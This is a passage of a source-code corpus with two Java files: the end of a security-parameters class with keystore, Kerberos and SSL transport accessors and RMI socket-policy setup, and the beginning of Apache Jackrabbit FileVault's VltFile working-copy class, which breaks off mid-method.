     * Resolves a possibly-relative file name against the configuration
     * directory, when known.  Returns null for a null input.
     */
    public File resolveFile(String filename) {
        if (filename == null) {
            return null;
        }
        final File origFile = new File(filename);
        if (!origFile.isAbsolute() && configDir != null) {
            return new File(configDir.getPath(), origFile.getPath());
        }
        return origFile;
    }

    /** Returns the configured keystore file name. */
    public String getKeystoreFile() {
        return map.get(ParameterState.SEC_KEYSTORE_FILE).asString();
    }

    /** Sets the keystore file name. */
    public void setKeystoreFile(String keystoreFile) {
        map.setParameter(ParameterState.SEC_KEYSTORE_FILE, keystoreFile);
    }

    /** Returns the keystore type, defaulting when not configured. */
    public String getKeystoreType() {
        final String type =
            map.get(ParameterState.SEC_KEYSTORE_TYPE).asString();

        /*
         * Use JKS if no explicit entry is found, since that was the Java
         * default prior to Java 9. This check is needed so that we use the
         * proper value when running with Java 9 or later since the default is
         * now PKCS12. For information on changing the default, see [#26773].
         */
        return ((type != null) && !"".equals(type)) ?
            type :
            MISSING_KEYSTORE_TYPE;
    }

    /** Sets the keystore type. */
    public void setKeystoreType(String keystoreType) {
        map.setParameter(ParameterState.SEC_KEYSTORE_TYPE, keystoreType);
    }

    /**
     * Returns the signature private key alias, or null if unset or empty.
     */
    public String getKeystoreSigPrivateKeyAlias() {
        final String ksPrivateKeyAlias =
            map.get(ParameterState.SEC_KEYSTORE_SIG_PRIVATE_KEY_ALIAS).
                asString();
        if (ksPrivateKeyAlias != null && !ksPrivateKeyAlias.isEmpty()) {
            return ksPrivateKeyAlias;
        }
        return null;
    }

    /** Sets the signature private key alias. */
    public void setKeystoreSigPrivateKeyAlias(String keyAlias) {
        map.setParameter(ParameterState.SEC_KEYSTORE_SIG_PRIVATE_KEY_ALIAS,
                         keyAlias);
    }

    /** Returns the configured truststore file name. */
    public String getTruststoreFile() {
        return map.get(ParameterState.SEC_TRUSTSTORE_FILE).asString();
    }

    /** Sets the truststore file name. */
    public void setTruststoreFile(String truststoreFile) {
        map.setParameter(ParameterState.SEC_TRUSTSTORE_FILE, truststoreFile);
    }

    /** Returns the truststore type, defaulting when not configured. */
    public String getTruststoreType() {
        final String type =
            map.get(ParameterState.SEC_TRUSTSTORE_TYPE).asString();

        /* As with the KeyStore type, use JKS if no explicit entry is found */
        return ((type != null) && !"".equals(type)) ?
            type :
            MISSING_KEYSTORE_TYPE;
    }

    /** Sets the truststore type. */
    public void setTruststoreType(String truststoreType) {
        map.setParameter(ParameterState.SEC_TRUSTSTORE_TYPE, truststoreType);
    }

    /**
     * Returns the signature public key alias, or null if unset or empty.
     */
    public String getTruststoreSigPublicKeyAlias() {
        final String tsPublicKeyAlias =
            map.get(ParameterState.SEC_TRUSTSTORE_SIG_PUBLIC_KEY_ALIAS).
                asString();
        if (tsPublicKeyAlias != null && !tsPublicKeyAlias.isEmpty()) {
            return tsPublicKeyAlias;
        }
        return null;
    }

    /** Sets the signature public key alias. */
    public void setTruststoreSigPublicKeyAlias(String keyAlias) {
        map.setParameter(ParameterState.SEC_TRUSTSTORE_SIG_PUBLIC_KEY_ALIAS,
                         keyAlias);
    }

    /** Returns the password file name. */
    public String getPasswordFile() {
        return map.get(ParameterState.SEC_PASSWORD_FILE).asString();
    }

    /** Sets the password file name. */
    public void setPasswordFile(String passwordFile) {
        map.setParameter(ParameterState.SEC_PASSWORD_FILE, passwordFile);
    }

    /** Returns the password manager class name. */
    public String getPasswordClass() {
        return map.get(ParameterState.SEC_PASSWORD_CLASS).asString();
    }

    /** Sets the password manager class name. */
    public void setPasswordClass(String passwordClass) {
        map.setParameter(ParameterState.SEC_PASSWORD_CLASS, passwordClass);
    }

    /** Returns the wallet directory name. */
    public String getWalletDir() {
        return map.get(ParameterState.SEC_WALLET_DIR).asString();
    }

    /** Sets the wallet directory name. */
    public void setWalletDir(String walletDir) {
        map.setParameter(ParameterState.SEC_WALLET_DIR, walletDir);
    }

    /** Returns the internal authentication mechanism. */
    public String getInternalAuth() {
        return map.get(ParameterState.SEC_INTERNAL_AUTH).asString();
    }

    /** Sets the internal authentication mechanism. */
    public void setInternalAuth(String internalAuth) {
        map.setParameter(ParameterState.SEC_INTERNAL_AUTH, internalAuth);
    }

    /** Returns the certificate mode. */
    public String getCertMode() {
        return map.get(ParameterState.SEC_CERT_MODE).asString();
    }

    /** Sets the certificate mode. */
    public void setCertMode(String certMode) {
        map.setParameter(ParameterState.SEC_CERT_MODE, certMode);
    }

    /**
     * Returns the keystore password alias, or null if unset or empty.
     */
    public String getKeystorePasswordAlias() {
        final String ksPwdAlias =
            map.get(ParameterState.SEC_KEYSTORE_PWD_ALIAS).asString();
        if (ksPwdAlias != null && ksPwdAlias.length() > 0) {
            return ksPwdAlias;
        }
        return null;
    }

    /** Sets the keystore password alias. */
    public void setKeystorePasswordAlias(String alias) {
        map.setParameter(ParameterState.SEC_KEYSTORE_PWD_ALIAS, alias);
    }

    /** Returns the signature algorithm. */
    public String getSignatureAlgorithm() {
        return map.get(ParameterState.SEC_SIGNATURE_ALGO).asString();
    }

    /** Sets the signature algorithm. */
    public void setSignatureAlgorithm(String sigAlgo) {
        map.setParameter(ParameterState.SEC_SIGNATURE_ALGO, sigAlgo);
    }

    /* Kerberos-related accessors */

    /**
     * Returns the Kerberos service name.  Note: unlike most accessors in
     * this class, this one uses getOrDefault, so a configured default is
     * returned when the parameter is absent.
     */
    public String getKerberosServiceName() {
        return map.getOrDefault(
            ParameterState.SEC_KERBEROS_SERVICE_NAME).asString();
    }

    /** Sets the Kerberos service name. */
    public void setKerberosServiceName(String serviceName) {
        map.setParameter(ParameterState.SEC_KERBEROS_SERVICE_NAME,
                         serviceName);
    }

    /** Returns the Kerberos instance name. */
    public String getKerberosInstanceName() {
        return map.get(ParameterState.SEC_KERBEROS_INSTANCE_NAME).asString();
    }

    /** Sets the Kerberos instance name. */
    public void setKerberosInstanceName(String instanceName) {
        map.setParameter(ParameterState.SEC_KERBEROS_INSTANCE_NAME,
                         instanceName);
    }

    /** Returns the Kerberos realm name. */
    public String getKerberosRealmName() {
        return map.get(ParameterState.SEC_KERBEROS_REALM_NAME).asString();
    }

    /** Sets the Kerberos realm name. */
    public void setKerberosRealmName(String realmName) {
        map.setParameter(ParameterState.SEC_KERBEROS_REALM_NAME, realmName);
    }

    /** Returns the Kerberos configuration file name. */
    public String getKerberosConfFile() {
        return map.get(ParameterState.SEC_KERBEROS_CONFIG_FILE).asString();
    }

    /** Sets the Kerberos configuration file name. */
    public void setKerberosConfFile(String confFile) {
        map.setParameter(ParameterState.SEC_KERBEROS_CONFIG_FILE, confFile);
    }

    /** Returns the Kerberos keytab file name. */
    public String getKerberosKeytabFile() {
        return map.get(ParameterState.SEC_KERBEROS_KEYTAB_FILE).asString();
    }

    /** Sets the Kerberos keytab file name. */
    public void setKerberosKeytabFile(String keytabFile) {
        map.setParameter(ParameterState.SEC_KERBEROS_KEYTAB_FILE, keytabFile);
    }

    /** Bundles the Kerberos realm, service and instance names. */
    public KrbPrincipalInfo getKerberosPrincipalInfo() {
        return new KrbPrincipalInfo(getKerberosRealmName(),
                                    getKerberosServiceName(),
                                    getKerberosInstanceName());
    }

    /* Transport-related accessors */

    /** Returns the transport type for the named transport. */
    public String getTransType(String transport) {
        return getTransType(requireTransportMap(transport));
    }

    /** Returns the transport type from a transport parameter map. */
    public String getTransType(final ParameterMap transportMap) {
        return transportMap.get(ParameterState.SEC_TRANS_TYPE).asString();
    }

    /** Sets the transport type for the named transport. */
    public void setTransType(String transport, String transType) {
        setTransType(requireTransportMap(transport), transType);
    }

    /** Sets the transport type in a transport parameter map. */
    public void setTransType(ParameterMap transportMap, String transType) {
        transportMap.setParameter(ParameterState.SEC_TRANS_TYPE, transType);
    }

    /*
     * Factory is applicable only if transport type == factory
     */

    /** Returns the factory class name for the named transport. */
    public String getTransFactory(String transport) {
        return getTransFactory(requireTransportMap(transport));
    }

    /** Returns the factory class name from a transport parameter map. */
    public String getTransFactory(ParameterMap transportMap) {
        return transportMap.get(ParameterState.SEC_TRANS_FACTORY).asString();
    }

    /** Sets the factory class name for the named transport. */
    public void setTransFactory(String transport, String factory) {
        setTransFactory(requireTransportMap(transport), factory);
    }

    /** Sets the factory class name in a transport parameter map. */
    public void setTransFactory(ParameterMap transportMap, String factory) {
        transportMap.setParameter(ParameterState.SEC_TRANS_FACTORY, factory);
    }

    /** Returns the server key alias for the named transport. */
    public String getTransServerKeyAlias(String transport) {
        return getTransServerKeyAlias(requireTransportMap(transport));
    }

    /** Returns the server key alias from a transport parameter map. */
    public String getTransServerKeyAlias(ParameterMap transportMap) {
        return transportMap.get(ParameterState.SEC_TRANS_SERVER_KEY_ALIAS).
            asString();
    }

    /** Sets the server key alias for the named transport. */
    public void setTransServerKeyAlias(String transport, String alias) {
        setTransServerKeyAlias(requireTransportMap(transport), alias);
    }

    /** Sets the server key alias in a transport parameter map. */
    public void setTransServerKeyAlias(ParameterMap transportMap,
                                       String alias) {
        transportMap.setParameter(
            ParameterState.SEC_TRANS_SERVER_KEY_ALIAS, alias);
    }

    /** Returns the client key alias for the named transport. */
    public String getTransClientKeyAlias(String transport) {
        return getTransClientKeyAlias(requireTransportMap(transport));
    }

    /** Returns the client key alias from a transport parameter map. */
    public String getTransClientKeyAlias(ParameterMap transportMap) {
        return transportMap.
            get(ParameterState.SEC_TRANS_CLIENT_KEY_ALIAS).asString();
    }

    /** Sets the client key alias for the named transport. */
    public void setTransClientKeyAlias(String transport, String alias) {
        setTransClientKeyAlias(requireTransportMap(transport), alias);
    }

    /** Sets the client key alias in a transport parameter map. */
    public void setTransClientKeyAlias(ParameterMap transportMap,
                                       String alias) {
        transportMap.setParameter(
            ParameterState.SEC_TRANS_CLIENT_KEY_ALIAS, alias);
    }

    /** Returns the allowed server cipher suites for the named transport. */
    public String getTransAllowCipherSuites(String transport) {
        return getTransAllowCipherSuites(requireTransportMap(transport));
    }

    /** Returns the allowed server cipher suites from a transport map. */
    public String getTransAllowCipherSuites(ParameterMap transportMap) {
        return transportMap.get(
            ParameterState.SEC_TRANS_ALLOW_CIPHER_SUITES).asString();
    }

    /** Sets the allowed server cipher suites for the named transport. */
    public void setTransAllowCipherSuites(String transport,
                                          String allowedSuites) {
        setTransAllowCipherSuites(requireTransportMap(transport),
                                  allowedSuites);
    }

    /** Sets the allowed server cipher suites in a transport map. */
    public void setTransAllowCipherSuites(ParameterMap transportMap,
                                          String allowedSuites) {
        transportMap.setParameter(
            ParameterState.SEC_TRANS_ALLOW_CIPHER_SUITES, allowedSuites);
    }

    /** Returns the allowed server protocols for the named transport. */
    public String getTransAllowProtocols(String transport) {
        return getTransAllowProtocols(requireTransportMap(transport));
    }

    /**
     * Returns the allowed server protocols from a transport map.  Uses
     * getOrDefault, so a configured default applies when unset.
     */
    public String getTransAllowProtocols(ParameterMap transportMap) {
        return transportMap.getOrDefault(
            ParameterState.SEC_TRANS_ALLOW_PROTOCOLS).asString();
    }

    /** Sets the allowed server protocols for the named transport. */
    public void setTransAllowProtocols(String transport,
                                       String allowedProtocols) {
        setTransAllowProtocols(requireTransportMap(transport),
                               allowedProtocols);
    }

    /** Sets the allowed server protocols in a transport map. */
    public void setTransAllowProtocols(ParameterMap transportMap,
                                       String allowedProtocols) {
        transportMap.setParameter(
            ParameterState.SEC_TRANS_ALLOW_PROTOCOLS, allowedProtocols);
    }

    /** Returns the allowed client cipher suites for the named transport. */
    public String getTransClientAllowCipherSuites(String transport) {
        return getTransClientAllowCipherSuites(requireTransportMap(transport));
    }

    /** Returns the allowed client cipher suites from a transport map. */
    public String getTransClientAllowCipherSuites(ParameterMap transportMap) {
        return transportMap.get(
            ParameterState.SEC_TRANS_CLIENT_ALLOW_CIPHER_SUITES).asString();
    }

    /** Sets the allowed client cipher suites for the named transport. */
    public void setTransClientAllowCipherSuites(String transport,
                                                String allowedSuites) {
        setTransClientAllowCipherSuites(requireTransportMap(transport),
                                        allowedSuites);
    }

    /** Sets the allowed client cipher suites in a transport map. */
    public void setTransClientAllowCipherSuites(ParameterMap transportMap,
                                                String allowedSuites) {
        transportMap.setParameter(
            ParameterState.SEC_TRANS_CLIENT_ALLOW_CIPHER_SUITES,
            allowedSuites);
    }

    /** Returns the allowed client protocols for the named transport. */
    public String getTransClientAllowProtocols(String transport) {
        return getTransClientAllowProtocols(requireTransportMap(transport));
    }

    /** Returns the allowed client protocols from a transport map. */
    public String getTransClientAllowProtocols(ParameterMap transportMap) {
        return transportMap.get(
            ParameterState.SEC_TRANS_CLIENT_ALLOW_PROTOCOLS).asString();
    }

    /** Sets the allowed client protocols for the named transport. */
    public void setTransClientAllowProtocols(String transport,
                                             String allowedProtocols) {
        setTransClientAllowProtocols(requireTransportMap(transport),
                                     allowedProtocols);
    }

    /** Sets the allowed client protocols in a transport map. */
    public void setTransClientAllowProtocols(ParameterMap transportMap,
                                             String allowedProtocols) {
        transportMap.setParameter(
            ParameterState.SEC_TRANS_CLIENT_ALLOW_PROTOCOLS,
            allowedProtocols);
    }

    /** Returns the allowed client identities for the named transport. */
    public String getTransClientIdentityAllowed(String transport) {
        return getTransClientIdentityAllowed(requireTransportMap(transport));
    }

    /** Returns the allowed client identities from a transport map. */
    public String getTransClientIdentityAllowed(
        ParameterMap transportMap) {
        return transportMap.get(
            ParameterState.SEC_TRANS_CLIENT_IDENT_ALLOW).asString();
    }

    /** Sets the allowed client identities for the named transport. */
    public void setTransClientIdentityAllowed(String transport,
                                              String identAllowed) {
        setTransClientIdentityAllowed(requireTransportMap(transport),
                                      identAllowed);
    }

    /** Sets the allowed client identities in a transport map. */
    public void setTransClientIdentityAllowed(ParameterMap transportMap,
                                              String identAllowed) {
        transportMap.setParameter(
            ParameterState.SEC_TRANS_CLIENT_IDENT_ALLOW, identAllowed);
    }

    /** Returns whether client authentication is required. */
    public boolean getTransClientAuthRequired(String transport) {
        return getTransClientAuthRequired(requireTransportMap(transport));
    }

    /** Returns whether client authentication is required, from a map. */
    public boolean getTransClientAuthRequired(ParameterMap transportMap) {
        return transportMap.get(
            ParameterState.SEC_TRANS_CLIENT_AUTH_REQUIRED).asBoolean();
    }

    /** Sets whether client authentication is required. */
    public void setTransClientAuthRequired(String transport,
                                           boolean authRequired) {
        setTransClientAuthRequired(requireTransportMap(transport),
                                   authRequired);
    }

    /** Sets whether client authentication is required, in a map. */
    public void setTransClientAuthRequired(ParameterMap transportMap,
                                           boolean authRequired) {
        transportMap.setParameter(ParameterState.SEC_TRANS_CLIENT_AUTH_REQUIRED,
                                  Boolean.toString(authRequired));
    }

    /** Returns the allowed server identities for the named transport. */
    public String getTransServerIdentityAllowed(String transport) {
        return getTransServerIdentityAllowed(requireTransportMap(transport));
    }

    /** Returns the allowed server identities from a transport map. */
    public String getTransServerIdentityAllowed(
        ParameterMap transportMap) {
        return transportMap.get(
            ParameterState.SEC_TRANS_SERVER_IDENT_ALLOW).asString();
    }

    /** Sets the allowed server identities for the named transport. */
    public void setTransServerIdentityAllowed(String transport,
                                              String identAllowed) {
        setTransServerIdentityAllowed(requireTransportMap(transport),
                                      identAllowed);
    }

    /** Sets the allowed server identities in a transport map. */
    public void setTransServerIdentityAllowed(ParameterMap transportMap,
                                              String identAllowed) {
        transportMap.setParameter(
            ParameterState.SEC_TRANS_SERVER_IDENT_ALLOW, identAllowed);
    }

    /*
     * Utility code
     */

    /**
     * Return the standard RMI socket policy.
     *
     * @return the standard RMI socket policy
     * @throws IllegalStateException if initRMISocketPolicies has not run
     */
    public RMISocketPolicy getRMISocketPolicy() {
        if (clientRMISocketPolicy == null) {
            throw new IllegalStateException(
                "No RMI socket policy is in force");
        }
        return clientRMISocketPolicy;
    }

    /**
     * Return the trusted RMI socket policy.
     *
     * @return the trusted RMI socket policy, if available, else null
     */
    public RMISocketPolicy getTrustedRMISocketPolicy() {
        return trustedRMISocketPolicy;
    }

    /**
     * Called by SN components to ensure that an appropriate RMISocketPolicy
     * is in place prior to creating the registryCSF.
     * @throws IllegalStateException if the security configuration is invalid
     */
    public void initRMISocketPolicies(Logger logger)
        throws IllegalStateException {

        if (isSecure()) {
            useRMISocketPolicies(logger);
        } else {
            useRMISocketPolicyDefaults();
        }
    }

    /**
     * Returns a set of properties that enables client communication with
     * the server.
     */
    public Properties getClientAccessProps() {
        final String transportName = "client";
        /*
         * NOTE(review): unlike createSSLKeyManagerFactory, this uses
         * getTransportMap, which returns null for a missing transport and
         * would produce an NPE below rather than the IllegalStateException
         * findTransportParams raises.  Behavior preserved here; confirm
         * whether callers rely on it before changing.
         */
        final ParameterMap transMap = getTransportMap(transportName);
        final RMISocketPolicyBuilder spb = (RMISocketPolicyBuilder)
            makeTransportFactory(transportName, transMap,
                                 RMISocketPolicyBuilder.class);
        final Properties props = spb.getClientAccessProperties(this, transMap);
        final String transportType =
            transMap.get(ParameterState.SEC_TRANS_TYPE).asString();
        if (transportType != null && !transportType.isEmpty()) {
            props.setProperty(KVSecurityConstants.TRANSPORT_PROPERTY,
                              transportType);
        }
        return props;
    }

    /**
     * Called to ensure that an appropriate RMISocketPolicy is in place prior
     * to creating the registryCSF.
     */
    private void useRMISocketPolicies(Logger logger)
        throws IllegalStateException {

        final RMISocketPolicy clientSocketPolicy =
            createClientRMISocketPolicy(logger);
        ClientSocketFactory.setRMIPolicy(clientSocketPolicy);
        clientRMISocketPolicy = clientSocketPolicy;

        final RMISocketPolicy trustedSocketPolicy =
            createTrustedRMISocketPolicy(logger);
        if (trustedSocketPolicy != null) {
            /* No need to supply a store context here */
            trustedSocketPolicy.prepareClient(null /* storeContext */,
                                              null /* clientId */);
            trustedRMISocketPolicy = trustedSocketPolicy;
        }
    }

    /**
     * Returns the transport map for the given name, or throws if absent.
     *
     * @throws IllegalStateException if the transport does not exist
     */
    private ParameterMap requireTransportMap(String transport) {
        final ParameterMap transportMap = transportMaps.get(transport);
        if (transportMap == null) {
            throw new IllegalStateException(
                "Transport " + transport + " does not exist");
        }
        return transportMap;
    }

    /**
     * Called to ensure that an appropriate RMISocketPolicy is in place prior
     * to creating the registryCSF when there is no security configuration in
     * place.
     */
    private void useRMISocketPolicyDefaults() {
        clientRMISocketPolicy = makeDefaultRMISocketPolicy();
        ClientSocketFactory.setRMIPolicy(clientRMISocketPolicy);
        trustedRMISocketPolicy = null;
    }

    /**
     * Return the RMI socket policy used for normal communication between
     * components.
     */
    private RMISocketPolicy createClientRMISocketPolicy(Logger logger)
        throws IllegalStateException {

        return makeRMISocketPolicy("client", logger);
    }

    /**
     * Return the RMI socket policy used by components when communicating
     * with other components in trusted mode, or null if the internal
     * transport is SSL but not trust-capable.
     */
    private RMISocketPolicy createTrustedRMISocketPolicy(Logger logger)
        throws IllegalStateException {

        final RMISocketPolicy internalPolicy =
            makeRMISocketPolicy("internal", logger);
        if (!transportSSLEnabled("internal")) {
            return internalPolicy;
        }
        return internalPolicy.isTrustCapable() ? internalPolicy : null;
    }

    /** Returns the cleartext socket policy used when security is off. */
    private static RMISocketPolicy makeDefaultRMISocketPolicy() {
        return new ClearSocketPolicy();
    }

    /**
     * Construct an RMISocketPolicy for the specified transportName.
     * @param transportName The name of a transport, which must be
     * present in the list of transports
     * @return An instance of RMISocketPolicy
     * @throws IllegalStateException if the policy cannot be constructed
     */
    private RMISocketPolicy makeRMISocketPolicy(String transportName,
                                                Logger logger)
        throws IllegalStateException {

        final ParameterMap transportParams =
            findTransportParams(transportName);
        final RMISocketPolicyBuilder spb = (RMISocketPolicyBuilder)
            makeTransportFactory(transportName, transportParams,
                                 RMISocketPolicyBuilder.class);
        try {
            return spb.makeSocketPolicy(this, transportParams, logger);
        } catch (Exception e) {
            throw new IllegalStateException(
                "Error constructing RMISocketPolicy using transport class " +
                "for transport " + transportName, e);
        }
    }

    /**
     * Construct a RepNetConfigBuilder for the specified transport
     * @param transportParams The transport configuration parameters
     * @return An instance of RepNetConfigBuilder
     */
    private RepNetConfigBuilder makeRepNetConfigBuilder(
        ParameterMap transportParams)
        throws IllegalStateException {

        final String transportName = transportParams.getName();
        return (RepNetConfigBuilder)
            makeTransportFactory(transportName, transportParams,
                                 RepNetConfigBuilder.class);
    }

    /**
     * Locate the ParameterMap for the specified transportName.
     *
     * @param transportName The name of a transport, which must be
     * present in the list of transports
     * @return The parameter map for the transport (never null)
     * @throws IllegalStateException if the transport parameter map cannot
     * be found.
     */
    private ParameterMap findTransportParams(String transportName)
        throws IllegalStateException {

        final ParameterMap transportParams = transportMaps.get(transportName);
        if (transportParams == null) {
            throw new IllegalStateException(
                "transport name " + transportName +
                " does not exist in the configuration");
        }
        return transportParams;
    }

    /**
     * Construct a transport factory for the specified transportName.
     * No assumption is made as to what purpose the transport factory is
     * being created.
     *
     * @param transportName The name of a transport, which must be
     * present in the list of transports
     * @param transportParams The parameter map for the transport
     * @param factoryInterfaceClass A class or interface to which the
     * resulting object must be castable.
     * @return An instance of the factory for the transport name
     * @throws IllegalStateException if the factory class cannot be resolved,
     * instantiated, or does not implement the requested interface
     */
    private Object makeTransportFactory(String transportName,
                                        ParameterMap transportParams,
                                        Class<?> factoryInterfaceClass)
        throws IllegalStateException {

        /*
         * Map the transport type to a factory class name.  An empty or
         * "factory" type defers to the explicitly configured factory class.
         */
        final String transportType = getTransType(transportParams);
        String transportFactory = null;
        if (transportType == null || transportType.isEmpty() ||
            TRANS_TYPE_FACTORY.equals(transportType)) {
            transportFactory = getTransFactory(transportParams);
        } else if (TRANS_TYPE_SSL.equals(transportType)) {
            transportFactory = SSLTransport.class.getName();
        } else if (TRANS_TYPE_CLEAR.equals(transportType)) {
            transportFactory = ClearTransport.class.getName();
        } else {
            throw new IllegalStateException(
                "Transport " + transportName +
                " has an unrecognized transportType: " + transportType);
        }

        if (transportFactory == null) {
            throw new IllegalStateException(
                "Transport " + transportName +
                " has no transportFactory parameter specified");
        }

        /* Resolve the transport factory class */
        Class<?> factoryClass = null;
        try {
            factoryClass = Class.forName(transportFactory);
        } catch (Exception e) {
            throw new IllegalStateException(
                "Error resolving transport class " + transportFactory +
                " for transport " + transportName, e);
        }

        /*
         * Get an instance of the factory class. It must have an accessible
         * no-argument constructor.
         */
        Object factoryObject = null;
        try {
            factoryObject =
                factoryClass.getDeclaredConstructor().newInstance();
        } catch (Exception e) {
            throw new IllegalStateException(
                "Error instantiating transport class " + transportFactory +
                " for transport " + transportName, e);
        }

        /* Check that the class implements the desired interface. */
        if (!factoryInterfaceClass.isInstance(factoryObject)) {
            throw new IllegalStateException(
                "Transport factory class " + transportFactory +
                " for transport " + transportName +
                " does not implement " + factoryInterfaceClass.getName());
        }

        return factoryObject;
    }

    /**
     * Get the set of JE properties needed to construct the
     * ReplicationNetworkConfig for JE HA.
     *
     * @throws IllegalStateException if the "ha" transport is not configured
     */
    public Properties getJEHAProperties() {
        /*
         * findTransportParams throws IllegalStateException for a missing
         * transport rather than returning null, so the null check that
         * previously followed this call was unreachable and has been removed.
         */
        final ParameterMap transportParams = findTransportParams("ha");
        final RepNetConfigBuilder builder =
            makeRepNetConfigBuilder(transportParams);
        return builder.makeChannelProperties(this, transportParams);
    }

    /**
     * The class contains service principal information. This class used for
     * passing principal information via
     * StorageNodeAgentAPI.getKerberosPrincipalInfo
     */
    public static class KrbPrincipalInfo implements Serializable {

        private static final long serialVersionUID = 1L;

        private final String realmName;
        private final String serviceName;
        private final String instanceName;

        KrbPrincipalInfo(String realmName,
                         String serviceName,
                         String instanceName) {
            this.realmName = realmName;
            this.serviceName = serviceName;
            this.instanceName = instanceName;
        }

        /** Returns the Kerberos realm name. */
        public String getRealmName() {
            return realmName;
        }

        /** Returns the Kerberos service name. */
        public String getServiceName() {
            return serviceName;
        }

        /** Returns the Kerberos instance name. */
        public String getInstanceName() {
            return instanceName;
        }
    }
}
apache/jackrabbit-filevault
35,823
vault-vlt/src/main/java/org/apache/jackrabbit/vault/vlt/VltFile.java
/*
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.apache.jackrabbit.vault.vlt;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.PrintStream;
import java.io.Reader;
import java.io.Writer;
import java.util.Locale;
import java.util.Properties;

import org.apache.commons.io.FileUtils;
import org.apache.jackrabbit.vault.fs.VaultFileCopy;
import org.apache.jackrabbit.vault.fs.api.VaultFile;
import org.apache.jackrabbit.vault.util.Constants;
import org.apache.jackrabbit.vault.util.LineOutputStream;
import org.apache.jackrabbit.vault.util.MD5;
import org.apache.jackrabbit.vault.util.MimeTypes;
import org.apache.jackrabbit.vault.util.PathUtil;
import org.apache.jackrabbit.vault.util.diff.DiffWriter;
import org.apache.jackrabbit.vault.util.diff.Document;
import org.apache.jackrabbit.vault.util.diff.DocumentDiff;
import org.apache.jackrabbit.vault.util.diff.DocumentDiff3;
import org.apache.jackrabbit.vault.util.diff.DocumentSource;
import org.apache.jackrabbit.vault.util.diff.FileDocumentSource;
import org.apache.jackrabbit.vault.util.diff.Hunk3;
import org.apache.jackrabbit.vault.util.diff.LineElementsFactory;
import org.apache.jackrabbit.vault.vlt.meta.MetaFile;
import org.apache.jackrabbit.vault.vlt.meta.MetaFileDocSource;
import org.apache.jackrabbit.vault.vlt.meta.VltEntry;
import org.apache.jackrabbit.vault.vlt.meta.VltEntryInfo;

/**
 * Represents one working-copy file (or directory) tracked by vlt. A {@code VltFile}
 * pairs the on-disk file with its {@link VltEntry} metadata and implements the
 * status / diff / update / merge operations against a remote {@link VaultFile}.
 * <p>
 * Also acts as a {@link DocumentSource} so it can label its own content in diffs.
 */
public class VltFile implements DocumentSource {

    /** Name of the (only) generic property supported: the file's MIME type. */
    public static final String PROP_CONTENT_TYPE = "vlt:mime-type";

    /**
     * Possible state of this file. Each state carries the one-letter code that is
     * printed in status listings (svn-style).
     */
    public enum State {
        CLEAN (" "),
        ADDED ("A"),
        CONFLICTED ("C"),
        DELETED ("D"),
        IGNORED ("I"),
        MODIFIED ("M"),
        REPLACED ("R"),
        UNKNOWN("?"),
        MISSING ("!"),
        OBSTRUCTED ("~"),
        VOID (" ");

        /** One-letter status code used in listings. */
        public final String letter;

        private State(String letter) {
            this.letter = letter;
        }

        public String toString() {
            return name().toLowerCase(Locale.ROOT) + " (" + letter + ")";
        }
    }

    /** Directory that contains this file; provides context, entries and meta storage. */
    private final VltDirectory parent;

    /** The actual file on disk (parent dir + name); may or may not exist. */
    private final File file;

    /** File name relative to {@link #parent}. */
    private final String name;

    /** Version-control entry for this file; {@code null} when not under control. */
    private VltEntry entry;

    /**
     * Creates a new VltFile for the given name inside {@code parent}.
     *
     * @param parent the containing vlt directory
     * @param name   the file name
     * @param entry  the vlt entry, or {@code null} if the file is not controlled
     * @throws VltException declared for symmetry with callers; not thrown here
     */
    public VltFile(VltDirectory parent, String name, VltEntry entry) throws VltException {
        this.parent = parent;
        this.name = name;
        this.entry = entry;
        this.file = new File(parent.getDirectory(), name);
    }

    /**
     * Returns the vlt properties of this file. Currently only
     * {@link #PROP_CONTENT_TYPE} is exposed (taken from the work entry).
     *
     * @return a (possibly empty) property set; never {@code null}
     */
    public Properties getProperties() throws VltException {
        Properties props = new Properties();
        if (entry != null) {
            VltEntryInfo info = entry.work();
            String ct = info.getContentType();
            if (ct != null) {
                props.put(PROP_CONTENT_TYPE, ct);
            }
        }
        return props;
    }

    /**
     * Returns the value of the given vlt property, or {@code null} if the file is
     * not controlled or the property is not {@link #PROP_CONTENT_TYPE}.
     */
    public String getProperty(String name) throws VltException {
        if (entry != null) {
            VltEntryInfo info = entry.work();
            if (name.equals(PROP_CONTENT_TYPE)) {
                return info.getContentType();
            }
        }
        return null;
    }

    /**
     * Sets a vlt property. Only {@link #PROP_CONTENT_TYPE} is supported, and only
     * on non-directory files.
     *
     * @throws VltException if the file is not controlled or the property is unknown
     */
    public void setProperty(String name, String value) throws VltException {
        if (entry == null) {
            throw error("Can't set property to non controlled file.");
        }
        VltEntryInfo info = entry.work();
        if (info == null) {
            throw error("Can't set property to non controlled file.");
        }
        if (name.equals(PROP_CONTENT_TYPE)) {
            if (!file.isDirectory()) {
                // silently ignore directories
                info.setContentType(value);
                parent.getContext().printMessage(this, name + "=" + value);
            }
        } else {
            throw error("Generic properies not supported, yet");
        }
    }

    /**
     * Computes the current {@link State} of this file by comparing the on-disk
     * file against its entry metadata.
     * <p>
     * Uncontrolled files report {@code UNKNOWN} (or {@code CLEAN} for the special
     * jcr_root), missing files {@code MISSING}, and controlled files are checked
     * via an MD5/size/date update of the work info against the base info.
     *
     * @throws VltException if the work info cannot be refreshed from disk
     */
    public State getStatus() throws VltException {
        State state = State.VOID;
        if (entry == null) {
            if (file.exists()) {
                // special check for jcr_root
                if (file.equals(parent.getContext().getExportRoot().getJcrRoot())) {
                    state = State.CLEAN;
                } else {
                    state = State.UNKNOWN;
                }
            } else {
                state = State.VOID;
            }
        } else {
            switch (entry.getState()) {
                case CLEAN:
                    if (file.exists()) {
                        if (file.isDirectory()) {
                            VltDirectory dir = descend();
                            // a controlled dir entry whose directory lost its control files is obstructed
                            if (dir.isControlled()) {
                                state = State.CLEAN;
                            } else {
                                state = State.OBSTRUCTED;
                            }
                        } else {
                            VltEntryInfo work = entry.work();
